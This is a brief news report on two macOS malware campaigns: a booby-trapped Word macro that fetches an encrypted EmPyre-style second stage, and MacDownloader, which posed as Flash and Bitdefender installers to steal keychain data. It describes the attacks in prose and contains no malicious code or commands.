macOS Under Attack
Researchers have discovered a Microsoft Word macro that can compromise macOS systems. Researchers at Objective See found that the Microsoft Word file titled “U.S. Allies and Rivals Digest Trump's Victory – Carnegie Endowment for International Peace” contains compromised macros.
According to the research firm Objective See, when a user opens the compromised file, it throws the usual macros warning and then checks to ensure that Little Snitch is not running on the system. The macro then tries to download a second-stage payload from https://www.securitychecking.org:443/index.asp . RC4 decrypts this payload and executes the now-decrypted payload.
Unfortunately, by the time researchers found out about the problem, the site securitychecking.org became inaccessible, so it is not clear what the second stage payload is. However, because the code is based on EmPyre, researchers believed that it could be the second-stage component of EmPyre, which is a persistent agent that allows a remote attacker continued access to an infected host.
This is the second macOS infection in the same week. Earlier researchers at Iran Threat found a macOS agent called MacDownloader that targeted the defense industrial base and a human rights advocate.
According to the GitHub page of Iran Threats, “MacDownloader strangely attempts to pose as both an installer for Adobe Flash, as well as the Bitdefender Adware Removal Tool, in order to extract system information and copies of OS X keychain databases.”